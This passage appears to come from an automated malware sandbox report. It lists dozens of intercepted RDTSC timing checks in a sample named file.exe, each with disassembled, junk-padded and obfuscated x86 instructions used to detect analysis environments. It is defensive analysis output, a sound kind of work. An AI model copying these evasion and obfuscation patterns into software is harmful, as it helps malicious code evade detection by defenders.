0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961021 second address: 961026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D35F second address: 95D373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAAC5092E56h 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007FAAC5092E56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961026 second address: 961038 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAC5254A88h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961038 second address: 961055 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5092E61h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961F49 second address: 961F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96119F second address: 9611A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963F7D second address: 963F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9631B9 second address: 9631BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963F81 second address: 963F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9631BD second address: 9631D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9631D7 second address: 9631E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FAAC5254A86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96421D second address: 964222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 965253 second address: 965259 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964222 second address: 964236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FAAC5092E64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 965259 second address: 965274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964236 second address: 96423A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966F2C second address: 966F5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FAAC5254A8Fh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A98h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966F5C second address: 966FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jo 00007FAAC5092E5Ch 0x00000010 mov dword ptr [ebp+122D1A1Bh], esi 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 pushad 0x0000001a call 00007FAAC5092E66h 0x0000001f pop ecx 0x00000020 popad 0x00000021 jng 00007FAAC5092E5Bh 0x00000027 mov ebx, 5867E46Eh 0x0000002c popad 0x0000002d mov bx, EB10h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FAAC5092E58h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, 02500E6Ch 0x00000052 jmp 00007FAAC5092E67h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jnl 00007FAAC5092E58h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967FC8 second address: 967FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96714A second address: 967155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967155 second address: 9671B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAAC5254A91h 0x0000000e jmp 00007FAAC5254A94h 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, 229CDCB0h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bl, 22h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a add bx, 69B6h 0x0000002f mov eax, dword ptr [ebp+122D13C5h] 0x00000035 mov bh, 7Bh 0x00000037 push FFFFFFFFh 0x00000039 mov bx, 9729h 0x0000003d push eax 0x0000003e jnp 00007FAAC5254A90h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96AF45 second address: 96AF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BDC0 second address: 96BE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAAC5254A8Fh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FAAC5254A88h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+12475D57h], eax 0x0000002e push 00000000h 0x00000030 mov bx, ax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FAAC5254A88h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f sub dword ptr [ebp+122D1872h], ecx 0x00000055 movzx edi, cx 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B0C0 second address: 96B0D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A01D second address: 96A021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A021 second address: 96A027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B0D2 second address: 96B179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FAAC5254A96h 0x0000000c nop 0x0000000d movsx ebx, bx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FAAC5254A88h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 stc 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FAAC5254A88h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D0355h] 0x00000059 call 00007FAAC5254A8Ah 0x0000005e mov edi, dword ptr [ebp+122D2A73h] 0x00000064 pop ebx 0x00000065 push FFFFFFFFh 0x00000067 pushad 0x00000068 mov dword ptr [ebp+122D229Eh], ebx 0x0000006e mov eax, ecx 0x00000070 popad 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push esi 0x00000075 jmp 00007FAAC5254A92h 0x0000007a pop esi 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B179 second address: 96B183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FAAC5092E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A027 second address: 96A0C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAAC5254A99h 0x0000000f nop 0x00000010 xor ebx, dword ptr [ebp+122D2B23h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d xor dword ptr [ebp+122D1F5Fh], ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jl 00007FAAC5254A86h 0x00000030 mov eax, dword ptr [ebp+122D10E9h] 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FAAC5254A88h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov ebx, dword ptr [ebp+1247D971h] 0x00000056 mov dword ptr [ebp+122D1B5Fh], edx 0x0000005c push FFFFFFFFh 0x0000005e mov ebx, 1856093Dh 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FAAC5254A93h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A0C1 second address: 96A0CB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A0CB second address: 96A0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5254A8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A0DD second address: 96A0F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FAAC5092E58h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9690FD second address: 969190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FAAC5254A8Dh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FAAC5254A88h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e call 00007FAAC5254A99h 0x00000033 mov bx, B3FDh 0x00000037 pop edi 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+122D2148h], eax 0x00000045 mov eax, dword ptr [ebp+122D0B31h] 0x0000004b push edx 0x0000004c clc 0x0000004d pop edi 0x0000004e mov bh, 1Eh 0x00000050 push FFFFFFFFh 0x00000052 mov dword ptr [ebp+122D18C8h], edx 0x00000058 nop 0x00000059 jmp 00007FAAC5254A90h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pushad 0x00000063 popad 0x00000064 pop ecx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969190 second address: 969196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CE54 second address: 96CE61 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CE61 second address: 96CE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BF46 second address: 96BF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DD9B second address: 96DE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FAAC5092E58h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D2CCFh] 0x00000029 sub di, 5E49h 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 mov ebx, 1FDF5497h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FAAC5092E58h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1F3Eh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FAAC5092E67h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D119 second address: 96D11E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FEE0 second address: 96FEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96F0A7 second address: 96F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FEE6 second address: 96FEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FEEA second address: 96FF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, 643Eh 0x00000010 push 00000000h 0x00000012 jmp 00007FAAC5254A97h 0x00000017 pushad 0x00000018 mov dword ptr [ebp+122D1F2Bh], eax 0x0000001e mov esi, ebx 0x00000020 popad 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FAAC5254A88h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d mov ebx, dword ptr [ebp+122D246Dh] 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007FAAC5254A99h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972378 second address: 97237D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97237D second address: 972389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9124A5 second address: 9124B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAC5092E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9124B1 second address: 9124B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9124B6 second address: 9124E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAC5092E66h 0x00000008 jmp 00007FAAC5092E5Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976846 second address: 97684D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9769E5 second address: 9769EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAC5092E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9769EF second address: 9769F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976B82 second address: 976B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976CE3 second address: 976D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A97h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5254A98h 0x00000011 jo 00007FAAC5254A86h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976D1F second address: 976D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976D2E second address: 976D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAC5254A94h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAC5254A8Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976D5A second address: 976D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976D5E second address: 976D88 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAAC5254A95h 0x00000012 jg 00007FAAC5254A86h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97CFCC second address: 97CFE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FAAC5092E5Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97CFE7 second address: 97D00A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FAAC5254A86h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D29F second address: 97D2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jp 00007FAAC5092E56h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAAC5092E5Ch 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D2C4 second address: 97D2CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982841 second address: 98284B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAC5092E6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98297B second address: 982998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A97h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982998 second address: 9829AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAC5092E61h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9829AE second address: 982A0E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAC5254A9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAAC5254A96h 0x0000000f js 00007FAAC5254AA8h 0x00000015 jmp 00007FAAC5254A8Dh 0x0000001a jmp 00007FAAC5254A95h 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FAAC5254A94h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9830D3 second address: 9830E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5092E5Ah 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9830E3 second address: 98310B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAC5254A97h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FAAC5254A86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98310B second address: 98310F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9879ED second address: 9879F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9868D0 second address: 9868DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DC63 second address: 95DC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DD75 second address: 95DDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnc 00007FAAC5092E74h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAC5092E66h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E17D second address: 7A1967 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FAAC5254A86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D389Fh], ebx 0x00000015 mov cx, 77C9h 0x00000019 push dword ptr [ebp+122D026Dh] 0x0000001f stc 0x00000020 call dword ptr [ebp+122D2960h] 0x00000026 pushad 0x00000027 jnp 00007FAAC5254A8Ch 0x0000002d xor dword ptr [ebp+122D199Fh], edx 0x00000033 xor eax, eax 0x00000035 pushad 0x00000036 or eax, dword ptr [ebp+122D2AC7h] 0x0000003c xor ecx, 16AAECAEh 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 cld 0x00000048 mov dword ptr [ebp+122D2A37h], eax 0x0000004e pushad 0x0000004f movzx edx, dx 0x00000052 pushad 0x00000053 sub dword ptr [ebp+122D199Fh], ebx 0x00000059 sub dword ptr [ebp+122D199Fh], edx 0x0000005f popad 0x00000060 popad 0x00000061 mov esi, 0000003Ch 0x00000066 je 00007FAAC5254A87h 0x0000006c cmc 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D240Dh], esi 0x00000077 lodsw 0x00000079 sub dword ptr 